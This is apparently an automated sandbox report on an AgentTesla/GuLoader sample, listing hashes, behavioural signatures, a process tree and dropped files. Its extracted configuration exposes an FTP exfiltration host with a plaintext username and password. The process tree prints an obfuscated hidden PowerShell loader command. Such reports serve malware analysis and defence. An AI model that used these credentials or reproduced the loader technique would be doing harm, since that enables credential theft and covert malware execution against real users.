Overview

overview

10

Static

static

1

fordanskni...nd.exe

windows7-x64

10

fordanskni...nd.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    07-12-2023 14:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fordanskningernes hildebrand.exe

  • Size

    684KB

  • MD5

    8db600d5b4168b5d358209fa4b85bd5f

  • SHA1

    d6822e043548fbacd692a14d7dc17250482c43bc

  • SHA256

    2ef9a5215999c03ea03636ae06f8c66b3ed1274153bdaec215a189cd148669b5

  • SHA512

    c2103215579019f69aa3e4adfa2067d90c9189c093c7b065e9693e3d8745f084810e7652dd0e2e6638eecc18344641aaa23460eb2799c3829b73462b08f741ca

  • SSDEEP

    12288:swFGHEDwfu4MFVS/GCFj+an2ry7/hFwz7ylgimtdYM3O0V7bbj:s5HEMfuDDSuCF6an2rg/hF7lgZtub0Vv

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fordanskningernes hildebrand.exe
    "C:\Users\Admin\AppData\Local\Temp\fordanskningernes hildebrand.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Osirify120=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win';$Calvarias=$Osirify120.SubString(53221,3);.$Calvarias($Osirify120)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:328
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win
    Filesize

    52KB

    MD5

    b78df76358c01d725b0d9e498d32d595

    SHA1

    89c5bc6f9d1d1da207899ce0677c24a99329dc70

    SHA256

    6cacb39cdff332ae98782d33db6fc877a76a8e1e01fa7a0ec9acf45a19cca2ea

    SHA512

    d7268e8c0e6040515d385835206af5b67c78ec5f6c4bdf7053ec28c00e3dcfdfa318fd03935e989bd856e3614a2ebb2d8bc50e2ecdbe7433b211291b0746cf8d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Overfit.Hov
    Filesize

    270KB

    MD5

    ec46e3263c35f658579cd1572e57def0

    SHA1

    18468cb8363e04d8257fd5503cc6350ff7432b88

    SHA256

    690cdbe972c183ace073bad0f8567a3f2f2f15bf3f31e0e714797fdd68bc4e03

    SHA512

    d283ea4285dd37379499dc45128449b05b41229149d22819d3b40f80deba233be346741242d6f64f0697562f1fbec5d2818b7d05e0a4d95692246334bca85768

    Download Submit

  • memory/328-165-0x0000000002610000-0x0000000002650000-memory.dmp

    Filesize

    256KB

    Download

  • memory/328-167-0x0000000077650000-0x0000000077726000-memory.dmp

    Filesize

    856KB

    Download

  • memory/328-156-0x0000000002610000-0x0000000002650000-memory.dmp

    Filesize

    256KB

    Download

  • memory/328-155-0x0000000002610000-0x0000000002650000-memory.dmp

    Filesize

    256KB

    Download

  • memory/328-154-0x0000000073CE0000-0x000000007428B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/328-161-0x0000000005080000-0x0000000005084000-memory.dmp

    Filesize

    16KB

    Download

  • memory/328-162-0x00000000062A0000-0x0000000007E64000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/328-163-0x00000000062A0000-0x0000000007E64000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/328-164-0x0000000073CE0000-0x000000007428B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/328-153-0x0000000073CE0000-0x000000007428B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/328-166-0x0000000077460000-0x0000000077609000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/328-157-0x0000000002610000-0x0000000002650000-memory.dmp

    Filesize

    256KB

    Download

  • memory/328-176-0x00000000062A0000-0x0000000007E64000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/328-169-0x00000000062A0000-0x0000000007E64000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1448-170-0x0000000077460000-0x0000000077609000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1448-172-0x000000006F7E0000-0x0000000070842000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1448-173-0x00000000011E0000-0x0000000002DA4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1448-174-0x000000006F7E0000-0x000000006F820000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1448-175-0x000000006F0F0000-0x000000006F7DE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1448-168-0x00000000011E0000-0x0000000002DA4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1448-178-0x00000000011E0000-0x0000000002DA4000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1448-180-0x0000000077460000-0x0000000077609000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1448-182-0x000000006F0F0000-0x000000006F7DE000-memory.dmp

    Filesize

    6.9MB

    Download